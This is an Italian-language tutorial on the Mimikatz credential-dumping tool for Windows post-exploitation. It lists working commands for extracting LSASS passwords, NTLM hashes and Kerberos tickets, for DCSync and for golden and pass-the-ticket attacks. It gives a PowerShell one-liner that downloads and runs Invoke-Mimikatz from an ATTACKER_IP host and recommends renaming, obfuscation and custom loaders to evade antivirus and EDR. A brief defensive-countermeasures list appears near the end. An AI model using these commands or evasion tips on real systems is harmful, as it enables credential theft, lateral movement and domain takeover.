Guida Approfondita su Mimikatz
Mimikatz è uno dei tool più noti e potenti nel panorama del penetration testing e del red teaming per l'estrazione di credenziali da sistemi Windows. Sviluppato da Benjamin Delpy, consente il dumping
Guida Approfondita su Mimikatz
Introduzione
Mimikatz è uno dei tool più noti e potenti nel panorama del penetration testing e del red teaming per l'estrazione di credenziali da sistemi Windows. Sviluppato da Benjamin Delpy, consente il dumping di password in chiaro, hash NTLM, ticket Kerberos e molto altro. Viene utilizzato in contesti di post-exploitation, privilege escalation e movimento laterale.
Attenzione: l’uso di Mimikatz è altamente invasivo e spesso rilevato dagli antivirus. Va eseguito solo in ambienti controllati o autorizzati.
Caratteristiche principali
- Estrazione di password in chiaro da LSASS
- Dump di hash NTLM, ticket Kerberos, certificati
- Pass-the-Hash e Pass-the-Ticket
- Golden e Silver Ticket
- Manipolazione di logon session
- Interazione con Credential Manager
Download e Preparazione
- Repositorio ufficiale: https://github.com/gentilkiwi/mimikatz
- Versione compilata: disponibile nella cartella
Win32ox64a seconda dell’architettura
Esecuzione
mimikatz.exePer evitare detection:
- Rinominare l’eseguibile
- Offuscare in memoria
- Usare loader custom in PowerShell o Cobalt Strike
Comandi di Base
Una volta avviato:
privilege::debug # Richiesto per molte funzioni
log mimikatz.log # Log dell'output su file
sekurlsa::logonpasswords # Estrae credenziali da LSASSModuli Principali
sekurlsa
Opera sulla memoria del processo LSASS per ottenere:
- Password in chiaro
- Hash NTLM
- Ticket Kerberos
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::ekeyslsadump
Dump di hash da SAM e NTDS:
lsadump::sam
lsadump::lsa /inject
lsadump::dcsync /user:Administratorkerberos
Manipolazione di ticket Kerberos:
kerberos::ptt ticket.kirbi # Pass-the-ticket
kerberos::golden ... # Golden ticketmisc e crypto
Recupero certificati, chiavi private e interazione con Credman:
misc::memssp
crypto::certificates /export
credmanUtilizzo con PowerShell (Invoke-Mimikatz)
Per esecuzione in memoria:
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Invoke-Mimikatz.ps1')
Invoke-MimikatzTecniche Offensive
- Dump credenziali dopo privilege escalation
- DCSync per emulare un Domain Controller e ottenere hash da AD
- Golden Ticket per persistenza nel dominio
- Pass-the-Hash/Ticket per movimento laterale
Esempio: Dump credenziali con mimikatz
privilege::debug
sekurlsa::logonpasswordsOutput tipico:
Username : Administrator
Password : P@ssw0rd123
Domain : LABDOMAINContromisure Difensive
- Abilitare Credential Guard e LSA Protection
- Segmentare l’accesso privilegiato
- Monitorare accessi a LSASS
- Disabilitare l’amministratore locale
- Logging avanzato con Sysmon + SIEM
Rilevamento
- Mimikatz è fortemente signature-based: AV/EDR lo bloccano facilmente
- Offuscare, usare loader personalizzati o strumenti alternativi (es. Rubeus)
Risorse Utili
Conclusione
Mimikatz è una delle armi più potenti per il post-exploitation in ambienti Windows. Tuttavia, la sua potenza è direttamente proporzionale al rischio operativo che comporta. Deve essere utilizzato con estrema cautela, sempre in contesti autorizzati e controllati, preferibilmente con tecniche di esecuzione in memoria per ridurre il footprint e la detection.